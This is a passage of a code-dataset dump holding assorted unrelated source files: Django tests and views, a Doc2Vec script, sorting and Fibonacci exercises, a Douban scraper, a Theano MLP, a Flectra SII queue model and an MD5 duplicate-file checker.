return\n\n\nspider(10)\n","sub_path":"Spyder.py","file_name":"Spyder.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"274837058","text":"from django.test import TestCase\nfrom main import models\nfrom django.core.files.images import ImageFile\nfrom decimal import Decimal\nimport logging\n\n\nclass TestThumbnailSignals(TestCase):\n def test_thumbnails_are_created_on_save(self):\n product = models.Product(\n name=\"The cathedral and the bazaar\",\n price=Decimal(\"20.00\")\n )\n product.save()\n\n with open(\"main/fixtures/the-cathedral-the-bazaar.jpg\", \"rb\") as f:\n image = models.ProductImage(\n product=product,\n image=ImageFile(f, name=\"tctb.jpg\"),\n )\n logger = logging.getLogger(\"main\")\n with self.assertLogs(logger, level=\"INFO\") as cm:\n image.save()\n\n self.assertGreaterEqual(len(cm.output), 1)\n image.refresh_from_db()\n\n with open(\"main/fixtures/the-cathedral-the-bazaar.thumb.jpg\", \"rb\") as tn:\n expected_content = tn.read()\n thumbnail = image.thumbnail.read()\n assert thumbnail == expected_content\n\n image.thumbnail.delete(save=False)\n image.image.delete(save=False)\n\n","sub_path":"django/main/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"445318639","text":"from xlrd import open_workbook\r\nfrom django.conf import settings\r\nimport re\r\n\r\n# Excel files will be named \"year div.xlsx\"\r\ndef getRollNos (year, div):\r\n\tbook = open_workbook (settings.BASE_PATH + \"mentorship/static/Roll Nos/%s %s.xlsx\"%(year,div))\r\n\r\n\t# first sheet\r\n\tsheet = book.sheet_by_index (0)\r\n\r\n\tstudents = []\r\n\r\n\tfor ind in range(sheet.nrows):\r\n\t\ttemp = sheet.row_values(ind)\r\n\t\tif re.match(\"[0-9]+\", str(temp[0])):\r\n\t\t\tstudents.append ((int(temp[0]), temp[1]))\r\n\t\telse:\r\n\t\t\tstudents.append ((temp[0], temp[1]))\r\n\r\n\treturn 
students\r\n","sub_path":"mentorship/administrator/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"17753489","text":"#!/bin/env python\n\n#\n# Jed Dobson\n# James.E.Dobson@Dartmouth.EDU\n# June 2020\n# \n# htrc-vector-project\n#\n\n\nimport csv\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport bz2\n\npages = list()\n# open CSV file and read individual pages of tokens\nwith bz2.open('drama_17412.csv.bz2','rt',encoding = \"ISO-8859-1\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n pages.append(row),\n\nprint(\"finished reading\")\n# produce tagged_data\ntagged_data = [TaggedDocument(words=_d, tags=[str(i)]) for i, _d in enumerate(pages)]\n\nprint(\"creating model\")\nmodel = Doc2Vec(tagged_data, \n dm=1, # operate on paragraphs with distributed memory model\n vector_size=300, # larger vector size might produce better results\n min_count=5, # drop words with very few repetitions\n window=100, # larger window size because of extracted features\n workers=4)\n\nprint(\"saving model\")\nmodel.save(\"doc2vec-07-28-2020-drama.w2v\")\n","sub_path":"scripts/mkmodel_csv.py","file_name":"mkmodel_csv.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"457074360","text":"from typing import List\n# Solution - 1 (GREEDY approach) O(n) time O(1) space\n'''\nFollows the idea of greedy approach\nwe keep calculating current max and compare it with global max\nUpdate global max if current max > global max\nNote since only positive numbers will increase cur_sum, \ngreedy approach works here with current accumulated sum vs num at current index.\n'''\ndef max_sub_array(self,nums:List[int]) -> int:\n n = len(nums)\n cur_sum = max_sum = nums[0]\n\n for i in range(1,n):\n cur_sum = max(nums[i],cur_sum + nums[i])\n max_sum = max(cur_sum,max_sum)\n return max_sum\n\n\n# Solution 2 - KADANES algorithm DP approach O(n) time O(1) space (since implemented with same array)\n'''\nFollows the idea of adding numbers only if they are \ngreater > 0 ( positive ) and using the current array \nas dp table. keep comparing to global max reached so far\nand return. 
Note: if you don't want to modify the input array, you can store\nan extra dp table.\n'''\ndef max_sub_array_dp(self,nums:List[int]) -> int:\n    n = len(nums)\n\n    max_sum = nums[0]\n    for i in range(1,n):\n        # Only add positive numbers\n        if nums[i-1] > 0:\n            # Store in current array to get max sum so far\n            nums[i] = nums[i] + nums[i-1]\n        max_sum = max(max_sum,nums[i])\n    return max_sum\n","sub_path":"LeetCode/FAQ/10-Maximum-Contiguous-Sum-Easy/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"494098761","text":"'''\nBOURDON ANTOINE-ALEXIS\nTP3 ALGO3\nL2 2018-2019\n'''\n\nimport time\nimport random\n\ndef fibonacci(n):\n\t'''Function computing the fibonacci sequence recursively.\n\t\n\tint -> int'''\n\tif n<=1:\n\t\treturn 1\n\treturn fibonacci(n-1)+fibonacci(n-2)\n\ndef fibonacci_iteratif(n):\n\t'''Function computing the fibonacci sequence iteratively.\n\t\n\tint -> int'''\n\ti=0\n\t# note: on the slides f(0) = 1, hence p = 1\n\tp, q=1,1\n\twhile i<n:\n\t\tp, q=q, p+q\n\t\ti+=1\n\treturn p\n\ndef fibonacci_terminale(n,p=1,q=1):\n\t'''Function computing the fibonacci sequence with tail recursion.\n\t\n\tint -> int'''\n\tif n==0:\n\t\treturn p\n\telse :\n\t\treturn fibonacci_terminale(n-1,q,p+q)\n\ndef comparaison_fibo(n):\n\ttemp1 = time.time()\n\tfibonacci(n)\n\tprint(\"For \",n,\" , the recursive fibonacci takes \",time.time()-temp1,\" seconds\")\n\n\ttemp1 = time.time()\n\tfibonacci_iteratif(n)\n\tprint(\"For \",n,\" , the iterative fibonacci takes \",time.time()-temp1,\" seconds\")\n\n\ttemp1 = time.time()\n\tfibonacci_terminale(n)\n\tprint(\"For \",n,\" , the tail-recursive fibonacci takes \",time.time()-temp1,\" seconds\")\n\n##2\n\ndef fac_iterative(n):\n\t'''Function computing the factorial of n iteratively.\n\t\n\tint -> int'''\n\tres=1\n\tfor i in range(2, n+1):\n\t\tres=res*i\n\treturn res\n\ndef fac_recursive(n):\n\t'''Function computing the factorial of n recursively.\n\t\n\tint -> int'''\n\tif n == 0:\n\t\treturn 1\n\telse :\n\t\treturn fac_recursive(n-1)*n\n##3\n\ndef liste_recur(l,i=0,j=1):\n\t'''Function returning the sum of the products l[i]*l[j].\n\t\n\tint -> int'''\n\tif (i==len(l)-2) and (j==len(l)-1):\n\t\treturn l[i]*l[j]\n\telif (j==len(l)-1):\n\t\treturn l[i]*l[j]+ liste_recur(l,i+1,i+2)\n\telse:\n\t\treturn l[i]*l[j]+ liste_recur(l,i,j+1)\n\n##4\ndef entier_intervalle(liste,nb1,nb2):\n\t'''Takes a list of integers and an interval, and checks that every value of the interval is indeed in the list\n\tliste--> List\n\tnb1--> int\n\tnb2--> int\n\treturn bool'''\n\tfor i in range (nb1,nb2+1):\n\t\tif i not in liste:\n\t\t\treturn False\n\treturn True\n\n##5\n\n\ndef fusion(l1,l2):\n\t'''Function merging two sorted lists\n\t\n\tlist, list -> list'''\n\tif l1==[]:\n\t\treturn l2\n\telif l2==[]:\n\t\treturn l1\n\telif l1[0]<l2[0]:\n\t\treturn [l1[0]]+fusion(l1[1:],l2)\n\telse:\n\t\treturn [l2[0]]+fusion(l1,l2[1:])\n\ndef fusion3(l1,l2,l3):\n\t'''Function merging three sorted lists\n\t\n\tlist, list, list -> list'''\n\tif l1 == []:\n\t\treturn fusion(l2,l3)\n\telif l2 == []:\n\t\treturn fusion(l1,l3)\n\telif l3 == []:\n\t\treturn fusion(l2,l1)\n\telif l1[0]<l2[0] and l1[0]<l3[0]:\n\t\treturn [l1[0]]+fusion3(l1[1:],l2,l3)\n\telif l2[0]<l1[0] and l2[0]<l3[0]:\n\t\treturn [l2[0]]+fusion3(l1,l2[1:],l3)\n\telse:\n\t\treturn [l3[0]]+fusion3(l1,l2,l3[1:])\n\ndef tri_insertion(tableau):\n\tfor i in range(1,len(tableau)):\n\t\ten_cours=tableau[i]\n\t\tj=i\n\t\twhile j>0 and tableau[j-1]>en_cours:\n\t\t\ttableau[j]=tableau[j-1]\n\t\t\tj = j-1\n\t\t\t#insert the element at its place\n\t\ttableau[j]=en_cours\n\t\t\n\t\n\ndef fusion(gauche,droite):\n\tresultat = []\n\tindex_gauche, index_droite = 0, 0\n\twhile index_gauche < len(gauche) and index_droite < len(droite):\n\t\tif gauche[index_gauche] <= droite[index_droite]:\n\t\t\tresultat.append(gauche[index_gauche])\n\t\t\tindex_gauche += 1\n\t\telse:\n\t\t\tresultat.append(droite[index_droite])\n\t\t\tindex_droite += 1\n\tif gauche:\n\t\tresultat.extend(gauche[index_gauche:])\n\tif 
droite:\n\t\tresultat.extend(droite[index_droite:])\n\treturn resultat\n\t \ndef tri_fusion(m):\n\tif len(m) <= 1:\n\t\treturn m\n\tmilieu = len(m) // 2\n\tgauche = m[:milieu]\n\tdroite = m[milieu:]\n\tgauche = tri_fusion(gauche)\n\tdroite = tri_fusion(droite)\n\treturn list(fusion(gauche, droite))\n\n\n\ndef tri_rapide(tableau):\n\tif not tableau:\n\t\treturn []\n\telse:\n\t\tpivot = tableau[-1]\n\t\tplus_petit = [x for x in tableau\t  if x < pivot]\n\t\tplus_grand = [x for x in tableau[:-1] if x >= pivot]\n\t\treturn tri_rapide(plus_petit) + [pivot] + tri_rapide(plus_grand)\n\ndef generer_exo6(n,i,j):\n\t'''Function generating a list of n values between i and j\n\tint, int, int -> list'''\n\treturn random.sample(range(i,j), n)\n\ndef comparaison_exo6(l):\n\t'''\n\tFunction comparing the 3 sorts seen in class and printing their times.\n\tBest sort: 1st quicksort, then 2nd merge sort, and finally 3rd insertion sort.\n\tArguments:\n\t\t-None\n\tReturns:\n\t\t-None\n\t'''\n\n\ttemps1_inser = time.time()\n\ttri_insertion(l.copy())\n\tprint(\"For array 1, insertion sort takes \",time.time()-temps1_inser,\" seconds\")\n\n\ttemps1_fusion = time.time()\n\ttri_fusion(l.copy())\n\tprint(\"For array 1, merge sort takes \",time.time()-temps1_fusion,\" seconds\")\n\n\ttemps1_rapide = time.time()\n\ttri_rapide(l.copy())\n\tprint(\"For array 1, quicksort takes \", time.time()-temps1_rapide, \" seconds\\n\")\n\n","sub_path":"L2/semestre3/algo3/TPs/TP03/BOURDON_Antoine-Alexis_TP3.py","file_name":"BOURDON_Antoine-Alexis_TP3.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"236664315","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\nimport unittest\nfrom unittest import TestCase\n\nfrom aliyun_oss.backends.oss import OSSStorage, OSSStorageFile\n\n\nclass SimpleTest(TestCase):\n    def setUp(self):\n        DEFAULT_FILE_STORAGE = 'aliyun_oss.backends.oss.OSSStorage'\n        OSS_ACCESS_URL = ''\n        OSS_ACCESS_KEY_ID = ''\n        OSS_SECRET_ACCESS_KEY = ''\n        OSS_STORAGE_BUCKET_NAME = ''\n        from aliyun_oss.backends import oss\n        oss.ACCESS_ADDRESS = OSS_ACCESS_URL\n        oss.ACCESS_KEY_NAME = OSS_ACCESS_KEY_ID\n        oss.SECRET_KEY_NAME = OSS_SECRET_ACCESS_KEY\n        oss.HEADERS = {}\n        oss.DEFAULT_ACL = 'public-read'\n        oss.OSS_STORAGE_BUCKET_NAME = OSS_STORAGE_BUCKET_NAME\n        oss.BUCKET_PREFIX = ''\n        self.storage = OSSStorage(bucket=OSS_STORAGE_BUCKET_NAME,\n                                  access_key=OSS_ACCESS_KEY_ID,\n                                  secret_key=OSS_SECRET_ACCESS_KEY\n                                  )\n\n    def test(self):\n        fname = '3rd/jquery-2.2.1.min.js'\n        rt = self.storage.exists(fname)\n        print('exists', rt)\n        fd = OSSStorageFile(name=fname, storage=self.storage, mode='r')\n        content = fd.open(fname)\n        fd = open('/tmp/aaa.txt', 'w')\n        fd.write(content)\n        fd.close()\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"aliyun_oss/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439818850","text":"# Given an array of integers nums and an integer target, return indices of the \n# two numbers such that they add up to target. \n# \n# You may assume that each input would have exactly one solution, and you may \n# not use the same element twice. \n# \n# You can return the answer in any order. 
\n# \n# \n# Example 1: \n# \n# \n# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# \n# \n# Example 2: \n# \n# \n# Input: nums = [3,2,4], target = 6\n# Output: [1,2]\n# \n# \n# Example 3: \n# \n# \n# Input: nums = [3,3], target = 6\n# Output: [0,1]\n# \n# \n# \n# Constraints: \n# \n# \n# 2 <= nums.length <= 10⁴ \n# -10⁹ <= nums[i] <= 10⁹ \n# -10⁹ <= target <= 10⁹ \n# Only one valid answer exists. \n# \n# \n# \n# Follow-up: Can you come up with an algorithm that is less than O(n²) time \n# complexity? Related Topics Array Hash Table 👍 24709 👎 815\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n    \"\"\"\n    O(N) Time\n    O(N) Space\n    \"\"\"\n\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        complements = {}\n        for index, value in enumerate(nums):\n            complement = target - value\n            if complement in complements:\n                return [index, complements[complement]]\n            else:\n                complements[value] = index\n    # leetcode submit region end(Prohibit modification and deletion)\n\n\nsolution = Solution()\ny = solution.twoSum([2, 7, 11, 15], 9)\nprint(y)\n","sub_path":"leetcode/editor/en/[1]Two Sum.py","file_name":"[1]Two Sum.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"105893206","text":"# coding: utf-8\n\nfrom flask import Blueprint, request, g, current_app\n\nfrom eru import consts\nfrom eru.models import App\nfrom eru.models.appconfig import verify_appconfig\nfrom eru.utils.decorator import jsonify, check_request_json, check_request_args\nfrom eru.utils.exception import EruAbortException\n\nbp = Blueprint('app', __name__, url_prefix='/api/app')\n\n@bp.route('/<name>/', methods=['GET', ])\n@jsonify\ndef get_app(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_NOT_FOUND, 'App %s not found' % name)\n    return app\n\n@bp.route('/<name>/<version>/', methods=['GET', ])\n@jsonify\ndef get_version(name, version):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_NOT_FOUND, 'App %s not found' % name)\n\n    v = app.get_version(version)\n    if not v:\n        raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n    return v\n\n@bp.route('/register/', methods=['POST', ])\n@jsonify\n@check_request_json(['name', 'version', 'git', 'token', 'appyaml'])\ndef register_app_version():\n    data = request.get_json()\n    name = data['name']\n\n    version = data['version']\n\n    app = App.get_or_create(name, data['git'], data['token'])\n    if not app:\n        current_app.logger.error('App create failed. (name=%s, version=%s)', name, version[:7])\n        raise EruAbortException(consts.HTTP_BAD_REQUEST,\n                'App %s create failed, maybe token duplicated' % name)\n\n    v = app.add_version(version)\n    if not v:\n        current_app.logger.error('Version create failed. (name=%s, version=%s)', name, version[:7])\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'Version %s create failed' % version[:7])\n\n    appyaml = data['appyaml']\n    try:\n        verify_appconfig(appyaml)\n    except (ValueError, KeyError) as e:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, e.message)\n\n    appconfig = v.appconfig\n    appconfig.update(**appyaml)\n    appconfig.save()\n    current_app.logger.info('App-Version created. 
(name=%s, version=%s)', name, version[:7])\n    return {'r': 0, 'msg': 'ok'}\n\n@bp.route('/<name>/env/', methods=['PUT', ])\n@jsonify\n@check_request_json('env')\ndef set_app_env(name):\n    data = request.get_json()\n    env = data.pop('env')\n\n    app = App.get_by_name(name)\n    if not app:\n        current_app.logger.error('App (name=%s) not found, env (env=%s) set ignored.', name, env)\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env set ignored' % name)\n\n    envconfig = app.get_resource_config(env)\n    envconfig.update(**data)\n    envconfig.save()\n    current_app.logger.info('App (name=%s) set env (env=%s) values done', name, env)\n    return {'r': 0, 'msg': 'ok'}\n\n@bp.route('/<name>/env/', methods=['GET', ])\n@jsonify\n@check_request_args('env')\ndef get_app_env(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n\n    envconfig = app.get_resource_config(request.args['env'])\n    return {'r': 0, 'msg': 'ok', 'data': envconfig.to_env_dict()}\n\n@bp.route('/<name>/listenv/', methods=['GET', ])\n@jsonify\ndef list_app_env(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST)\n    return {'r': 0, 'msg': 'ok', 'data': app.list_resource_config()}\n\n@bp.route('/<name>/containers/', methods=['GET', ])\n@jsonify\ndef list_app_containers(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, container list ignored' % name)\n    return {'r': 0, 'msg': 'ok', 'containers': app.list_containers(g.start, g.limit)}\n\n@bp.route('/<name>/tasks/', methods=['GET', ])\n@jsonify\ndef list_app_tasks(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, container list ignored' % name)\n    return {'r': 0, 'msg': 'ok', 'tasks': app.list_tasks(g.start, g.limit)}\n\n@bp.route('/<name>/versions/', methods=['GET', ])\n@jsonify\ndef list_app_versions(name):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, version list ignored' % name)\n    return {'r': 0, 'msg': 'ok', 'versions': app.list_versions(g.start, g.limit)}\n\n@bp.route('/<name>/<version>/containers/', methods=['GET', ])\n@jsonify\ndef list_version_containers(name, version):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n    v = app.get_version(version)\n    if not v:\n        raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n    return {'r': 0, 'msg': 'ok', 'containers': v.list_containers(g.start, g.limit)}\n\n@bp.route('/<name>/<version>/tasks/', methods=['GET', ])\n@jsonify\ndef list_version_tasks(name, version):\n    app = App.get_by_name(name)\n    if not app:\n        raise EruAbortException(consts.HTTP_BAD_REQUEST, 'App %s not found, env list ignored' % name)\n    v = app.get_version(version)\n    if not v:\n        raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n    return {'r': 0, 'msg': 'ok', 'tasks': v.list_tasks(g.start, g.limit)}\n","sub_path":"eru/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"624543248","text":"import requests\nimport bs4\nimport time\n\nbaseUrl = \"https://movie.douban.com/top250\"\n\n\ndef getUrl(url):\n    head = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\"\n                      \" (KHTML, like Gecko) 
Chrome/85.0.4183.102 Safari/537.36\"\n    }\n    req = requests.get(url, headers=head)\n    return req.text\n\n\n# dataList = [getUrl(baseUrl+\"?start=\"+str(x)) for x in range(0,250,25)] # a list comprehension builds the whole list directly: less code, but it holds everything in memory and can overflow on large data\ndataListG = (getUrl(baseUrl + \"?start=\" + str(x)) for x in range(0, 250, 25))  # a generator stores the algorithm instead, saving memory: only one element is held at a time\n\ncount = 1\n# for i in dataList:\nfor i in dataListG:\n    soup = bs4.BeautifulSoup(i,\"html.parser\")\n    a = soup.findAll('div', class_='info')  # 'class' alone would be ambiguous (reserved word), so it needs the trailing underscore\n    for j in a:\n        print(j.find(\"span\", class_=\"title\").text)\n        print(count)\n        count += 1\n","sub_path":"爬/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"412721150","text":"from django.shortcuts import render_to_response,RequestContext\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom vertex.models import Vertex,Edge,Flow\nimport json\nfrom django.utils import timezone\n\n \ndef profile(request, user_id):\n\tclient = None\n\ttry:\n\t\teml = request.COOKIES[ 'email' ]\n\t\tpwd = request.COOKIES[ 'password' ]\n\t\tclient = Vertex.objects.get(email = eml)\n\t\tif client.password != pwd:\n\t\t\traise LookupError()\n\texcept:\n\t\tclient = None\n\t\t\n\ttry:\n\t\tvertex = Vertex.objects.get(user_id=user_id)\n \n\texcept :\n\t\treturn render_to_response('404error.html',\n\t\t\t{},\n\t\t\tcontext_instance=RequestContext(request))\n \n    #flows = client.flow_set.order_by('-last_forward_date')[:5] \n\tme = False\n\tif client:\n\t\tif client.user_id == vertex.user_id:\n\t\t\tme = True\n\tif request.POST and client and not me:\n \n\t\ttry:\n\t\t\tnew_edge = Edge.objects.get(vertex_tail_id = client.user_id,vertex_head_id = user_id)\n\t\texcept:\n\t\t\tnew_edge = Edge(vertex_tail_id = client.user_id,vertex_head_id = user_id)\n\t\t\tnew_edge.save()\n\t\n\t\n\tif me:\n\t\treturn render_to_response('vertex.html',\n\t\t\t{\"VERTEX_DETAIL\":\"yourself\",\"VERTEX_ID\":user_id, \"FOLLOWING_VERTEX\":vertex.get_following(), \"FOLLOWER_VERTEX\":vertex.get_followers(), },\n\t\t\tcontext_instance=RequestContext(request))\n\telse:\n\t\treturn render_to_response('vertex.html',\n\t\t\t{\"VERTEX_DETAIL\":vertex.firstname+' '+vertex.lastname,\"VERTEX_ID\":user_id,\"FOLLOWING_VERTEX\":vertex.get_following() , \"FOLLOWER_VERTEX\":vertex.get_followers(), },\n\t\t\tcontext_instance=RequestContext(request))\n\t\n\treturn HttpResponse(\"You're looking at vertex %s.\" % vertex)\ndef postflow(request,user_id):\n    flow_text = request.POST['flow_text']\n    pub_date = timezone.now()\n    newflow = Flow.objects.create(text = flow_text,pub_date = timezone.now(),last_forward_date = timezone.now(),owner = user_id)\n    vertex = Vertex.objects.get(user_id = user_id)\n    newflow.set_history(vertex.user_id)\n    newflow.save()\n    vertex.flow_set.add(newflow)\n    #gotta add others too\n    \n    \ndef forward(request,user_id):\n    flow_text = request.POST['flow_text']\n    forward_to = request.POST['forward_to']\n    flow = Flow.objects.get(text = flow_text)\n    flow.last_forward_date = timezone.now()\n    flow.save()\n    vertex = Vertex.objects.get(user_id = user_id)\n    if forward_to == \"all\":\n        followers_list = vertex.get_followers()\n        for followers in followers_list:\n            followers.flow_set.add(flow)\n            followers.save()\n    else:\n        forward_list = [] #I'll change it later with the html\n        for index,followers in enumerate(forward_list):\n            follower = Vertex.objects.get(user_id = followers)\n            follower.flow_set.add(flow)\n            follower.save()\n    \n    \n    \n    \ndef 
like_flow(request,liker_id):\n flow_text = request.POST['flow_text']\n flow = Flow.objects.get(text = flow_text)\n flow.like(liker_id)\n flow.save()\n \n \n# Create your views here.\n","sub_path":"vertex/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"646550352","text":"# -*- coding: utf-8 -*-\nfrom flectra import fields, models, api, _\nimport ast\nfrom datetime import datetime\nfrom flectra.tools import DEFAULT_SERVER_DATETIME_FORMAT as DTF\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass ColaEnvio(models.Model):\n _name = \"sii.cola_envio\"\n\n doc_ids = fields.Char(string=\"Id Documentos\")\n model = fields.Char(string=\"Model destino\")\n user_id = fields.Many2one('res.users')\n tipo_trabajo = fields.Selection([('pasivo', 'pasivo'), ('envio', 'Envío'),('consulta', 'Consulta')], string=\"Tipo de trabajo\")\n active = fields.Boolean(string=\"Active\", default=True)\n n_atencion = fields.Char(string=\"Número atención\")\n date_time = fields.Datetime('Auto Envío al SII')\n\n def _procesar_tipo_trabajo(self):\n docs = self.env[self.model].browse(ast.literal_eval(self.doc_ids))\n if self.tipo_trabajo in [ 'pasivo' ]:\n if docs[0].sii_result not in ['', 'NoEnviado']:\n self.unlink()\n return\n if self.date_time and datetime.now() >= datetime.strptime(self.date_time, DTF):\n for d in docs:\n d.sii_result = 'EnCola'\n try:\n docs.do_dte_send()\n if docs[0].sii_send_ident:\n self.tipo_trabajo = 'consulta'\n except Exception as e:\n for d in docs:\n d.sii_result = 'NoEnviado'\n _logger.warning('Error en Envío automático')\n _logger.warning(str(e))\n return\n if docs[0].sii_send_ident and docs[0].sii_message and docs[0].sii_result in ['Proceso', 'Rechazado']:\n self.unlink()\n return\n else:\n for doc in docs :\n doc.responsable_envio = self.user_id\n if self.tipo_trabajo == 'envio' or not docs[0].sii_send_ident:\n try:\n docs.do_dte_send(self.n_atencion)\n if docs[0].sii_result not in ['', 'NoEnviado']:\n self.tipo_trabajo = 'consulta'\n except Exception as e:\n _logger.warning(\"Error en envío Cola\")\n _logger.warning(str(e))\n else:\n try:\n docs[0].ask_for_dte_status()\n except Exception as e:\n _logger.warning(\"Error en Consulta\")\n _logger.warning(str(e))\n\n @api.model\n def _cron_procesar_cola(self):\n ids = self.search([('active','=',True)])\n if ids:\n for c in ids:\n c._procesar_tipo_trabajo()\n","sub_path":"Free/l10n_cl_fe/models/sii_cola_envio.py","file_name":"sii_cola_envio.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"276203210","text":"from __future__ import print_function\n__docformat__ = 'restructedtext en'\n\nimport os\nimport sys\nimport timeit\nimport numpy\nimport theano\nimport theano.tensor as T\nfrom ann.lgrg.logistic_regression import LogisticRegression\nfrom ann.loader.mnist_loader import MnistLoader\nfrom ann.mlp.hidden_layer import HiddenLayer\n\nclass MLP(object):\n def __init__(self, rng, input, n_in, n_hidden, n_out, hW=None, hb=None, W=None, b=None):\n self.hiddenLayer = HiddenLayer(\n rng=rng,\n input=input,\n n_in=n_in,\n n_out=n_hidden,\n activation=T.tanh,\n W = hW,\n b = hb\n )\n self.logRegressionLayer = LogisticRegression(\n input=self.hiddenLayer.output,\n n_in=n_hidden,\n n_out=n_out,\n W = W,\n b = b\n )\n self.L1 = (\n abs(self.hiddenLayer.W).sum()\n + abs(self.logRegressionLayer.W).sum()\n )\n 
self.L2_sqr = (\n            (self.hiddenLayer.W ** 2).sum()\n            + (self.logRegressionLayer.W ** 2).sum()\n        )\n        self.negative_log_likelihood = (\n            self.logRegressionLayer.negative_log_likelihood\n        )\n        self.errors = self.logRegressionLayer.errors\n        self.params = self.hiddenLayer.params + \\\n            self.logRegressionLayer.params\n        self.input = input\n    \n\n","sub_path":"ann/mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"466519919","text":"import hashlib\nimport os\n\npath = r\"C:\\Users\\anuts\\Desktop\\审核图片\"\ndict0 = {1: '宾玉洁', 2: '陈波涌', 3: '陈雅婷', 4: '谌莹玲', 5: '邓汀', 6: '郭金花', 7: '胡娟', 8: '胡未珊', 9: '胡瑶', 10: '黄洁', 11: '黄璞', 12: '黄倩文', 13: '姜智藩', 14: '李港', 15: '李妮芝', 16: '李强', 17: '李秋慧',\n         18: '李艳桃', 19: '廖露芳', 20: '林芷仪', 21: '刘洁', 22: '', 23: '刘淇', 24: '刘诗佳', 25: '刘小静', 26: '卢玉婷', 27: '糜霞', 28: '任瑾', 29: '汤甜伊', 30: '田欢纯', 31: '王玲', 32: '王宗雄', 33: '吴德红', 34: '伍永玲',\n         35: '夏子婷', 36: '向成露', 37: '许可', 38: '鄢芳', 39: '尤鑫杰', 40: '张思琪', 41: '钟代霞', 42: '周玉金', 43: '周圆梦', 44: '黎娟', 45: '刘佩瑶', 46: '关琦月', 47: '蒋慧东', 48: '张艺凡', 49: '胡芬', 50: '袁选',\n         51: '雷文勇', 52: '李慧', 53: '陈彦宇', 54: '刘诗凤', 55: '陈柳汐'}\n# convert the filename prefix to an int\ndef listturnint(list):\n    splitparam = list.split('.', 1)\n    paramstr = ''.join(splitparam[0])\n    paramint = int(paramstr)\n    if paramint > 55:\n        # print(\"a value greater than 55 was found, exception thrown!!\")\n        return 0\n    else:\n        return paramint\n\n# Function: return the md5 value of each file\ndef Remd5ValueDict(path):\n    dc={}\n    for root, dirs, files in os.walk(path):\n        for i in files:\n            file = os.path.join(root,i)\n            md5 = hashlib.md5()\n            md5file = open(file, 'rb')\n            fd = md5file.read()\n            md5.update(fd)\n            dc[listturnint(i)]=md5.hexdigest()\n    return dc\n\n\n# Function: check whether files are duplicated\ndco = Remd5ValueDict(path)\ndcs = sorted(dco.items(), key=lambda d: d[1])\nprint(dcs)\n\ndef xaingtong(i, list):\n    if i>>> generate_log_array(['a','d'])\n    ['a\\\\nd']\n    >>> generate_log_array(['a', '2012', 'c'])\n    ['a', '2012\\\\nc']\n    '''\n    log_arr = []\n    last_start_line_n = 0\n    for line_n, msg in enumerate(raw_msg_arr):\n        if line_n > 